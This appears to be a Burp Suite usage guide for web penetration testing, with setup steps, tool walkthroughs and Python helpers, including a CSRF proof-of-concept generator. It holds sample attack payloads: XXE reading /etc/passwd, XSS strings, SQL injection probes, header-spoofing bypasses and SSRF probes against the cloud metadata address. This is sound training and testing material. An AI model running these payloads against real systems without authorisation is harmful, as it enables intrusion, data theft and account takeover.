```bash
# Linux (apt): Kali ships Burp Community as the package "burpsuite"
sudo apt-get install burpsuite
# Linux (manual download): copy the installer link from https://portswigger.net/burp/releases
# ("v2024.x" below is a placeholder for the release you downloaded)
chmod +x burpsuite_community_linux_v2024.x_installer_x64.sh
./burpsuite_community_linux_v2024.x_installer_x64.sh
# macOS (Homebrew; Burp is a GUI app, so it is installed as a cask)
brew install --cask burp-suite-community
# Windows
# Download from portswigger.net and run installer
```
- Purchase from Burp website
- Install via same methods as Community
- Activate with license key (can also use 30-day free trial)
| Component | Requirement |
|---|---|
| Java | The installer bundles its own JRE; running the bare JAR needs a current LTS Java (17+ for recent releases) |
| RAM | 4GB minimum (8GB+ recommended) |
| Disk | 2GB free space |
| OS | Linux, macOS, Windows |
- Settings → Network Settings → Settings… (proxy settings)
- Manual proxy configuration
- HTTP Proxy: 127.0.0.1, Port: 8080
- Tick “Also use this proxy for HTTPS” (HTTPS traffic must also go through Burp)
```bash
# Via command line (use a throwaway profile so the proxy setting does not affect normal browsing)
google-chrome --proxy-server="http://127.0.0.1:8080" --user-data-dir=/tmp/burp-profile
# Or configure system proxy settings
# Settings → Advanced → System → Open proxy settings
```
- Proxy → Proxy settings (Settings → Tools → Proxy in 2022+ builds; “Options” in older ones)
- Click “Add” under Proxy listeners
- Bind to address: 127.0.0.1, Port: 8080 (bind to all interfaces only when you need a phone or VM to use the proxy, and then keep the host firewalled)
- Check “Running”
- With the browser already pointed at the proxy, browse to http://burpsuite and click “CA Certificate” to download `cacert.der` (or Proxy settings → Import / export CA certificate → Export → Certificate in DER format)
- Firefox → Settings → Privacy & Security → Certificates → View Certificates → Authorities → Import
- Select the downloaded certificate and tick “Trust this CA to identify websites”
```bash
# Linux: update-ca-certificates only picks up PEM files with a .crt extension, so convert the DER first
openssl x509 -inform der -in cacert.der -out burp.crt
sudo cp burp.crt /usr/local/share/ca-certificates/
sudo update-ca-certificates
# macOS
sudo security add-trusted-cert -d -r trustRoot \
  -k /Library/Keychains/System.keychain cacert.der
# Windows
# Double-click certificate → Install Certificate → Local Machine → Place in “Trusted Root Certification Authorities”
# Note: Chrome/Edge use the OS store; Firefox keeps its own store and needs the import above.
# Remove the Burp CA from any non-testing machine afterwards: whoever holds its key can intercept TLS.
```
- Open Proxy → Intercept
- Check “Intercept is on”
- Browse normally in configured browser
- Requests appear in Intercept tab
- Edit and click “Forward” or “Drop”
| Feature | Purpose |
|---|---|
| Intercept rules | Only intercept requests matching rules (e.g. in scope, specific file types) |
| Logger | View all traffic from every tool, not just the Proxy |
| History | Browse captured requests |
| Scope | Limit to target domains only |
```text
Ctrl+T       Toggle intercept on/off
Ctrl+F       Forward intercepted request
(no default) Drop: assign a hotkey under Settings → User interface → Hotkeys
Ctrl+U       URL encode selected text (Ctrl+Shift+U decodes)
```
- Select request in Proxy History
- Right-click → Send to Repeater (Ctrl+R)
- Edit request in left panel
- Click “Send” (or Ctrl+Space)
- View response in right panel; the tab keeps a history of every request/response pair so you can step back
| Test | Method |
|---|---|
| Parameter manipulation | Edit parameter values |
| Authentication bypass | Remove/modify auth headers |
| SQLi detection | Inject quotes, SQL keywords |
| Header injection | Add/modify headers |
| Method override | Change GET to POST (right-click → Change request method) |
```http
# Path override headers: test whether a front end enforces access control on the URL
# while the back end routes on the override header (compare the response with a plain GET /admin)
X-Original-URL: /admin
X-Rewrite-URL: /admin

# Source-IP spoofing: test whether an IP allowlist or WAF trusts client-supplied headers
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1

# Test for XXE (send with Content-Type: application/xml on an endpoint that parses XML)
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
```
| Type | Use Case | Payload |
|---|---|---|
| Sniper | Single parameter fuzzing | One payload set; each position fuzzed in turn |
| Battering Ram | Multiple identical payloads | Same payload in all positions |
| Pitchfork | Multiple different payloads | One payload set per position, advanced in lockstep (paired) |
| Cluster Bomb | Cartesian product | One set per position, all combinations |
- Proxy history or Repeater → right-click → Send to Intruder (Ctrl+I)
- Positions tab → Clear § → select each value to fuzz → Add §; the attack type is chosen here
- Payloads tab → pick the payload set (one per position for Pitchfork/Cluster Bomb) and payload type
- Add payload set (numbers, strings, custom)
- Settings tab → grep match/extract; resource pool threads are a Pro feature (Community Intruder is rate-limited)
- Start attack
- Simple list (wordlist file)
- Numbers (range, step)
- Brute force (charset, length)
- Runtime file (external file path)
- Recursive grep (extract from responses)
- Character substitution
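The four attack types are easier to size (and to explain to a reviewer) when you can see exactly which requests each one produces. The following is an added example, not code from PortSwigger or from the page, that re-implements the position/payload logic of each attack type over a `§`-marked template, the same marker syntax Intruder uses; the login template and payload lists are constructed sample data.

```python
"""Intruder attack types, reimplemented in plain Python."""
import itertools
import re
from typing import Iterator, List, Sequence

# Burp marks payload positions with section signs: user=§admin§&pass=§password§
_POS_RE = re.compile(r"§([^§]*)§")


def base_values(template: str) -> List[str]:
    """Return the original value of every §...§ position, left to right."""
    return _POS_RE.findall(template)


def render(template: str, values: Sequence[str]) -> str:
    """Substitute one value per position, left to right."""
    it = iter(values)
    return _POS_RE.sub(lambda _m: next(it), template)


def attack_requests(template: str, attack: str, payload_sets: List[List[str]]) -> Iterator[str]:
    """Yield every request Intruder would send for the given attack type.

    sniper        : one payload set; each position is fuzzed in turn while the
                    others keep their base value (positions x payloads requests)
    battering_ram : one payload set; the same payload goes into every position
    pitchfork     : one set per position, advanced in lockstep (stops at the
                    shortest set)
    cluster_bomb  : one set per position, Cartesian product of all sets
    """
    base = base_values(template)
    n = len(base)
    if n == 0:
        raise ValueError("template has no §...§ payload positions")
    if not payload_sets:
        raise ValueError("at least one payload set is required")
    if attack in ("pitchfork", "cluster_bomb") and len(payload_sets) < n:
        raise ValueError(f"{attack} needs one payload set per position ({n})")

    if attack == "sniper":
        for i in range(n):
            for payload in payload_sets[0]:
                values = list(base)
                values[i] = payload
                yield render(template, values)
    elif attack == "battering_ram":
        for payload in payload_sets[0]:
            yield render(template, [payload] * n)
    elif attack == "pitchfork":
        for combo in zip(*payload_sets[:n]):
            yield render(template, combo)
    elif attack == "cluster_bomb":
        for combo in itertools.product(*payload_sets[:n]):
            yield render(template, combo)
    else:
        raise ValueError(f"unknown attack type: {attack}")


def request_count(template: str, attack: str, payload_sets: List[List[str]]) -> int:
    """Number of requests an attack will issue; useful for sizing against the Community throttle."""
    return sum(1 for _ in attack_requests(template, attack, payload_sets))


if __name__ == "__main__":
    # Constructed example: a login form with two marked positions.
    TEMPLATE = "POST /login HTTP/1.1\r\nHost: target.example\r\n\r\nuser=§admin§&pass=§password§"
    USERS = ["admin", "root"]
    PASSWORDS = ["letmein", "Winter2024!", "password"]
    for attack in ("sniper", "battering_ram", "pitchfork", "cluster_bomb"):
        print(f"{attack:14} {request_count(TEMPLATE, attack, [USERS, PASSWORDS])} requests")
        for req in attack_requests(TEMPLATE, attack, [USERS, PASSWORDS]):
            print("   ", req.rsplit("\r\n", 1)[-1])
```

Pitchfork is the one to reach for when the payloads are paired (a username list and the matching password list, or a user ID and its CSRF token); Cluster Bomb is the one that explodes (2 × 3 here, but 1,000 × 1,000 is a million requests), so check `request_count` before starting an attack against a rate-limited target.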
```bash
# Raising the JVM heap does NOT lift the Community Intruder rate limit; it only gives Burp more memory
# Installer builds: add the flag to the .vmoptions file next to the Burp binary
echo "-Xmx8g" >> BurpSuiteCommunity.vmoptions
# JAR builds: pass it to the JVM directly
java -Xmx8g -jar burpsuite_community.jar
# For fast, multi-threaded attacks in Community, install the Turbo Intruder BApp instead
```
- Pro only: right-click a request → “Do active scan” (or “Scan” for the guided dialog), or Dashboard → New scan
- Configure crawl and audit settings and the scan scope
- Pick an audit configuration (select vulnerability categories) and click “OK”
- Progress shows under Dashboard → Tasks
| Setting | Option |
|---|---|
| Crawl | Crawl strategy and limits (max link depth, time, whether to crawl parent directories) |
| Audit | Select vulnerability types |
| Consolidate | Group duplicate issues |
| Throttle | Control request rate |
- Cross-site scripting (XSS)
- SQL injection (SQLi)
- Insecure authentication
- Cross-site request forgery (CSRF)
- Broken access control
- External entity (XXE) injection
- Insecure deserialization
- Server-side template injection (SSTI)
- Dashboard → Issue activity (or Target → Site map → Issues pane)
- Click issue → advisory, request/response evidence, remediation
- Filter by severity (High, Medium, Low, Info) and by confidence (Certain, Firm, Tentative)
- Select issues → right-click → Report selected issues (HTML, XML)
- In Proxy history, find the response that issues the token (e.g. the Set-Cookie after login)
- Right-click → Send to Sequencer
- Sequencer → Live capture: choose the token location (cookie, form field, or custom location)
- Click “Start live capture”; collect at least a few hundred samples (thousands for a reliable verdict)
- “Analyze now” → overall quality rating and estimated effective entropy in bits
| Entropy (average per byte, character-level) | Quality |
|---|---|
| 7+ bits/byte | Good randomness |
| 5-7 bits/byte | Moderate randomness |
| <5 bits/byte | Poor randomness (predictable tokens) |

Sequencer reports the effective entropy of the whole token in bits together with an overall rating; the per-byte bands above are a rule of thumb for raw token bytes. Decode hex or Base64 tokens before reasoning about them (a hex character carries at most 4 bits), and remember that a per-position analysis cannot see correlations between positions, such as a timestamp spread across several bytes.
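To make the bits-per-byte figures concrete, here is an added example (not PortSwigger's code) that computes character-level entropy for a sample of tokens the way the table above is read: Shannon entropy per byte position, summed into an effective-bits estimate and averaged into bits/byte. The two token generators are constructed stand-ins for a CSPRNG-backed session ID and a counter-based one; the last lines show why a hex-encoded token must be decoded before analysis.

```python
"""Character-level entropy estimate for session tokens, in the spirit of Sequencer's analysis."""
import math
import random
from collections import Counter
from typing import Dict, List, Sequence


def shannon_bits(symbols: Sequence[int]) -> float:
    """Shannon entropy in bits of the observed distribution of one token position."""
    n = len(symbols)
    return -sum((c / n) * math.log2(c / n) for c in Counter(symbols).values())


def per_position_entropy(tokens: Sequence[bytes]) -> List[float]:
    """Entropy of each byte position across the sample; every token must have the same length."""
    length = len(tokens[0])
    if any(len(t) != length for t in tokens):
        raise ValueError("all tokens must have the same length")
    return [shannon_bits([t[i] for t in tokens]) for i in range(length)]


def rate(bits_per_byte: float) -> str:
    """Map average bits per byte to the quality bands from the table above."""
    if bits_per_byte >= 7:
        return "good"
    if bits_per_byte >= 5:
        return "moderate"
    return "poor"


def analyze(tokens: Sequence[bytes]) -> Dict[str, object]:
    """Summarise a token sample: per-position bits, total effective bits, average bits/byte, rating.

    Position-wise entropy only catches per-position bias; it cannot see correlations
    between positions (e.g. a timestamp spread over several bytes), and small samples
    underestimate entropy, so collect thousands of tokens before trusting the verdict.
    """
    per_pos = per_position_entropy(tokens)
    total = sum(per_pos)
    avg = total / len(per_pos)
    return {
        "samples": len(tokens),
        "bits_per_position": [round(b, 2) for b in per_pos],
        "bits_total": round(total, 1),
        "bits_per_byte": round(avg, 2),
        "rating": rate(avg),
    }


def sample_random_tokens(count: int, length: int, seed: int = 1) -> List[bytes]:
    """Constructed sample: seeded PRNG bytes standing in for a CSPRNG-backed session ID."""
    rng = random.Random(seed)
    return [bytes(rng.getrandbits(8) for _ in range(length)) for _ in range(count)]


def sample_counter_tokens(count: int, length: int) -> List[bytes]:
    """Constructed sample: fixed prefix plus a big-endian counter, a classic weak session ID."""
    return [b"\x00" * (length - 4) + i.to_bytes(4, "big") for i in range(count)]


if __name__ == "__main__":
    print("random :", analyze(sample_random_tokens(4000, 16)))
    print("counter:", analyze(sample_counter_tokens(4000, 16)))
    # Hex or Base64 tokens must be decoded first: a hex character carries at most 4 bits,
    # so analysing the text form of a strong token would wrongly rate it "poor".
    hex_tokens = [t.hex() for t in sample_random_tokens(4000, 8)]
    print("hex text:", analyze([h.encode() for h in hex_tokens])["bits_per_byte"])
    print("decoded :", analyze([bytes.fromhex(h) for h in hex_tokens])["bits_per_byte"])
```

With 4,000 samples the random tokens come out just under 8 bits/byte (the estimator is biased low for small samples), the counter tokens land under 1 bit/byte because twelve of the sixteen positions never change, and the same strong tokens scored as hex text cap at 4 bits/byte. Sequencer additionally runs bit-level tests (FIPS-style) that catch patterns this character-level view misses, so treat this as a first-pass check, not a replacement.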
Decode as / Encode as: Plain, URL, HTML, Base64, ASCII hex, Hex, Octal, Binary, Gzip; Hash: MD5, SHA-1, SHA-256 and others; “Smart decode” guesses the encoding for you. Decoder does not cover Unicode escapes or Base32; the Hackvertor BApp handles those and chained transformations.
- Decoder tab → Paste encoded value
- Select decoder type
- View decoded output
- Switch encoders by clicking format buttons
```text
# Encoded payload as seen in a query string
%27%20OR%20%271%27%3D%271
# After URL decode
' OR '1'='1
# Recognisable as a SQL injection attempt (quote-break plus tautology)
```
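Decoder's “Smart decode” peels encoding layers one at a time; the added example below (not PortSwigger's code) does the same offline for the three encodings that show up most in captured parameters, URL, hex and Base64, and then runs a small SQL-injection heuristic over the plaintext. The sample values are constructed: the URL-encoded payload from above, a double-encoded variant and a Base64 variant of it.

```python
"""Layered decoding plus a SQLi heuristic, mirroring the Decoder workflow above."""
import base64
import binascii
import re
from typing import List, Tuple
from urllib.parse import unquote

_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
_HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
_SQLI_RE = re.compile(
    r"'\s*(?:or|and)\s*'?\w+'?\s*=\s*'?\w+|"   # ' OR '1'='1   ' AND 1=1
    r"\bunion\s+(?:all\s+)?select\b|"           # UNION SELECT
    r"\b(?:sleep|benchmark)\s*\(|\bwaitfor\s+delay\b|"  # time-based probes
    r"(?:--|#|/\*)\s*$",                        # trailing SQL comment
    re.IGNORECASE,
)


def _printable(data: bytes) -> bool:
    """Only accept decodings that yield printable ASCII; binary output means it was not that encoding."""
    return len(data) > 0 and all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def decode_once(value: str) -> Tuple[str, str]:
    """Try URL, hex and Base64 decoding in that order; return (layer_name, decoded) or ("", value)."""
    url = unquote(value)  # unquote, not unquote_plus: leave '+' alone so Base64 survives
    if url != value:
        return "url", url
    if _HEX_RE.match(value) and len(value) >= 8:
        raw = binascii.unhexlify(value)
        if _printable(raw):
            return "hex", raw.decode("ascii")
    if _B64_RE.match(value) and len(value) % 4 == 0 and len(value) >= 8:
        try:
            raw = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            raw = b""
        if _printable(raw):
            return "base64", raw.decode("ascii")
    return "", value


def smart_decode(value: str, max_layers: int = 5) -> Tuple[str, List[str]]:
    """Peel encoding layers until nothing changes; return (plaintext, layers applied outermost first)."""
    layers: List[str] = []
    for _ in range(max_layers):
        name, decoded = decode_once(value)
        if not name:
            break
        layers.append(name)
        value = decoded
    return value, layers


def looks_like_sqli(value: str) -> bool:
    """Heuristic only: flags the classic shapes, not a substitute for testing the parameter."""
    return _SQLI_RE.search(value) is not None


if __name__ == "__main__":
    # Constructed samples: the payload above, a double-encoded variant and a Base64 variant.
    for sample in ("%27%20OR%20%271%27%3D%271",
                   "%2527%2520OR%2520%25271%2527%253D%25271",
                   "JyBPUiAnMSc9JzE="):
        plain, layers = smart_decode(sample)
        print(f"{sample!r:45} -> {plain!r}  via {layers}  sqli={looks_like_sqli(plain)}")
```

The printable-output check is what keeps the heuristic honest: short alphanumeric values such as `admin123` are syntactically valid Base64 and hex, and without it they would be “decoded” into garbage. Double URL encoding is worth testing explicitly because a WAF that decodes once and a back end that decodes twice see different strings.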
- Select two requests
- Right-click → Send to Comparer (x2)
- Comparer tab → Compare
- View byte-by-byte or word-by-word diff
| Scenario | Purpose |
|---|---|
| Before/after WAF bypass | Identify filtering changes |
| Admin vs user responses | Find authorization issues |
| Cached vs fresh response | Detect information disclosure |
- Extensions tab (called “Extender” in older builds) → BApp Store
- Browse the store (several hundred extensions; each entry says whether it needs Pro)
- Click “Install”; extensions written in Python or Ruby need the Jython/JRuby JAR configured under Extensions settings
| Extension | Purpose |
|---|---|
| Param Miner | Discover hidden parameters and headers (works in Community) |
| Turbo Intruder | Fast, scriptable multi-threaded attacks; the usual workaround for the Community Intruder throttle |
| ActiveScan++ | Extra Scanner checks (needs the Pro Scanner) |
| Collaborator Everywhere | Injects Collaborator payloads for SSRF/OOB detection (needs Collaborator, Pro) |
| HTTP Request Smuggler | HTTP desync attacks |
```java
// Minimal Burp extension using the legacy Extender API: the class must be burp.BurpExtender.
// New extensions should use the Montoya API (BurpExtension / MontoyaApi) instead.
package burp;

public class BurpExtender implements IBurpExtender {
    @Override
    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
        callbacks.setExtensionName("My Custom Extension");
        callbacks.printOutput("Loaded"); // appears in the extension's Output tab
    }
}
```
- Target → Scope settings → Include in scope → Add
- Enter the URL prefix or host, e.g. `example.com` (advanced mode lets you set protocol, host regex, port and file)
- Exclude from scope: logout URLs, out-of-scope hosts
- Proxy settings → Request interception rules → enable the “URL is in target scope” rule so only in-scope requests are intercepted
- Proxy history → Filter → “Show only in-scope items”
- When prompted on scope changes, choose to stop logging out-of-scope traffic
- Reduces noise in logs
- Keeps Scanner and crawling on the target
- Prevents accidental requests to sites you are not authorised to test
- Proxy settings → Match and replace rules → Add
- Choose the type (request header, request body, response header, …) and tick “Regex match” if needed
- Set match condition (regex supported)
- Set replacement value (leave empty to delete the matched header)
- Check enabled
| Type | Match | Replace | Purpose |
|---|---|---|---|
| Request header | `User-Agent:.*` | `User-Agent: Mozilla/5.0` | Standardize user agent |
| Request header | `Authorization:.*` | `Authorization: Bearer TOKEN` | Inject a token into every request |
| Request header | `CSRF-Token:.*` | `CSRF-Token:` | Blank the token to test whether the server actually validates it |
- Log in once through the proxy so the login requests are in Proxy history
- Settings → Sessions → Macros → Add → select the login requests from the history
- Configure item → Burp picks up cookies automatically; add a custom parameter to extract a token from the response body if needed
- Test macro, then close
- Settings → Sessions → Session handling rules → Add → Rule actions → “Run a macro” (e.g. only after “Check session is valid” fails)
- Scope the rule to the tools (Intruder, Repeater, Scanner) and URLs it should apply to
- Intruder attacks then run with a fresh session
- Settings → Sessions → Cookie jar: choose which tools update the jar (Proxy by default)
- Open the cookie jar to add or edit domain cookies manually
- Session handling rules → Add
- Set rule actions (use cookies from the jar, set a specific header, run a macro, check session validity)
- Configure scope (tools, URLs)
- Enable the rule
- Pro only: Burp menu → Burp Collaborator client → Copy to clipboard (or right-click in Repeater/Intruder → Insert Collaborator payload)
- Inject the payload into the parameter, e.g. `https://<payload-id>.oastify.com/...` (oastify.com is the public server; you can run a private one)
- Poll now → check for interactions
- View DNS/HTTP/SMTP interactions from the target, including the source IP and the raw request
| Vulnerability | Method |
|---|---|
| Blind SQLi | Out-of-band DNS lookup via DB-specific functions (e.g. `xp_dirtree` on MSSQL); `1' AND SLEEP(5)--` is a time-based Repeater check, not a Collaborator one |
| XXE | External entity pointing at the Collaborator URL |
| SSRF | Collaborator URL in a URL parameter |
| Command injection | `nslookup`/`ping` against the Collaborator hostname |
```html
<!-- Reflected XSS -->
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<!-- Stored XSS -->
<!-- Submit via form, verify it appears in other users' responses -->
<!-- DOM-based XSS -->
<!-- Check the browser console and DOM Invader (in Burp's browser) after the payload -->
```
```sql
-- Union-based (add NULLs until the column count matches)
' UNION SELECT NULL, NULL, NULL--
-- Boolean-based (compare the two responses)
' AND 1=1--
' AND 1=2--
-- Time-based: MSSQL
'; WAITFOR DELAY '00:00:05'--
-- Time-based: MySQL (note the space after -- ; stacked queries are often disabled, so prefer AND)
' AND SLEEP(5)-- 
```
- Repeater → capture the state-changing POST; strip custom headers (Authorization, X-CSRF-Token) but keep the Cookie, since a forged form can only send cookies
- If the request still succeeds, create an HTML page with a form whose action is the target URL and a hidden input per body parameter (Pro: right-click → Engagement tools → Generate CSRF PoC)
- Open the page from a different origin in a browser that is logged in to the target
- Check whether the action succeeds; a failure may be a SameSite cookie rather than a token, so check the Set-Cookie attributes before closing the issue
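Generate CSRF PoC is a Pro engagement tool; the added example below (not PortSwigger's code) does the equivalent for Community users: it parses a raw POST request as copied from Proxy history and emits an auto-submitting HTML form. The captured request is constructed sample data; the host `target.example` and the parameter names are assumptions.

```python
"""Generate a CSRF proof-of-concept page from a captured form POST."""
from html import escape
from typing import Dict, Tuple
from urllib.parse import parse_qsl


def parse_raw_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request (as copied from Proxy history) into method, path, headers, body."""
    head, _sep, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _colon, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def csrf_poc(raw: str, scheme: str = "https") -> str:
    """Return an auto-submitting HTML form that replays the request body from a third-party origin.

    Cookie and Authorization headers from the capture are deliberately not reproduced:
    the victim's browser attaches its own cookies, which is exactly what the test checks.
    """
    method, path, headers, body = parse_raw_request(raw)
    if method.upper() != "POST":
        raise ValueError("this generator handles form POSTs; for GET use a plain link or <img src>")
    content_type = headers.get("content-type", "")
    if not content_type.startswith("application/x-www-form-urlencoded"):
        raise ValueError("a plain HTML form can only send form-encoded bodies; JSON/XML need fetch() and CORS")
    if "host" not in headers:
        raise ValueError("Host header missing")
    action = f"{scheme}://{headers['host']}{path}"
    fields = "\n".join(
        f'    <input type="hidden" name="{escape(k, quote=True)}" value="{escape(v, quote=True)}">'
        for k, v in parse_qsl(body, keep_blank_values=True)
    )
    return (
        "<html><body>\n"
        f'  <form id="csrf" action="{escape(action, quote=True)}" method="POST">\n'
        f"{fields}\n"
        "  </form>\n"
        '  <script>document.getElementById("csrf").submit();</script>\n'
        "</body></html>\n"
    )


# Constructed capture: a state-changing POST carrying only a session cookie and no anti-CSRF token.
SAMPLE_REQUEST = (
    "POST /account/email HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=abc123\r\n"
    "Content-Length: 29\r\n"
    "\r\n"
    "email=attacker%40evil.example"
)

if __name__ == "__main__":
    print(csrf_poc(SAMPLE_REQUEST))
```

Serve the output from an origin other than the target and load it in a logged-in browser. If the session cookie is `SameSite=Lax` or `Strict`, the browser will not attach it to this cross-site POST and the request fails for that reason alone, so read the cookie attributes before reporting either a finding or a false negative.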
```text
# Probe internal services from a URL-fetching parameter
http://localhost:8080
http://127.0.0.1:3000
http://169.254.169.254/latest/meta-data/
# Port sweep via Intruder: mark the port as the payload position and use a Numbers payload set
http://localhost:§PORT§
```
```bash
# Community edition has no headless/CLI scanning (Pro or Burp Suite Enterprise)
# Pro: start headless with a project file and a saved config
java -Djava.awt.headless=true -jar burpsuite_pro_v2024.x.jar \
  --project-file=/path/to/project.burp \
  --user-config-file=/path/to/config.json
# CI pipelines (Jenkins etc.) drive scans through the Pro REST API
# (enable it under Settings → Suite → REST API; default listener is 127.0.0.1:1337)
curl -X POST http://127.0.0.1:1337/v0.1/scan \
  -H "Content-Type: application/json" \
  -d '{"urls":["https://example.com"]}'
```
- Startup wizard → New project on disk → name and save location (local `.burp` file); Pro only, Community supports temporary projects only and keeps nothing on exit
- Pro writes to the project file continuously, so there is no explicit save step; Burp menu → Save copy of project makes a snapshot
- Startup wizard → Open existing project
- All proxy history, site map and Scanner results preserved
- Target → Site map → right-click → Save selected items (XML) or Copy URLs in this host
- Issues (Pro) → right-click → Report selected issues
- Format: HTML, XML (JSON is available from the REST API and extensions, not from the report dialog)
| Format | Use |
|---|---|
| HTML | Client reports, stakeholders |
| XML | Automated processing, CI/CD |
| JSON | API integration (REST API / extensions) |
- Keep proxy history small: set the target scope early and stop logging out-of-scope traffic when Burp asks
- Pro: pause or delete the live passive crawl task (Dashboard → Tasks) when you do not need it
- Use scope filtering everywhere: Target → Scope, Proxy history filter, interception rules
- Community: Intruder is rate-limited; use Turbo Intruder for bulk requests
- Pro: increase resource pool threads, within what the target can take
- Focus on High/Medium severity only
- Run active scans on known endpoints rather than whole hosts
- Split into multiple projects by subdomain
- Use match/replace to inject tokens
- Save intermediate copies of the `.burp` project periodically
| Shortcut | Action |
|---|---|
| Ctrl+T | Toggle intercept |
| Ctrl+F | Forward intercepted request |
| Ctrl+Space | Send the current Repeater request |
| Ctrl+R | Send to Repeater |
| Ctrl+I | Send to Intruder |
| Ctrl+U / Ctrl+Shift+U | URL encode / decode selection |
| Ctrl+B / Ctrl+Shift+B | Base64 encode / decode selection |
| Ctrl+Shift+P / R / I | Jump to the Proxy / Repeater / Intruder tab |

All bindings are configurable under Settings → User interface → Hotkeys. There is no save shortcut: Pro project files are written continuously.
| Feature | Community | Pro |
|---|---|---|
| Proxy | ✓ | ✓ |
| Repeater | ✓ | ✓ |
| Decoder | ✓ | ✓ |
| Scanner | ✗ (manual testing only) | ✓ automated crawl and audit |
| Intruder | Rate-limited | Full speed, resource pools |
| Sequencer | ✓ | ✓ |
| Comparer | ✓ | ✓ |
| Extensions | ✓ (BApps that need the Scanner or Collaborator excluded) | ✓ |
| Collaborator | ✗ | ✓ |
| Macros / session handling | ✓ | ✓ |
| Project files | Temporary only | Saved on disk |
| Engagement tools (CSRF PoC etc.) | ✗ | ✓ |
| Headless scanning / REST API | ✗ | ✓ |
- Official docs: portswigger.net/burp/documentation
- Academy: portswigger.net/web-security (free labs)
- Community: forum.portswigger.net
- Extensions: portswigger.net/bapps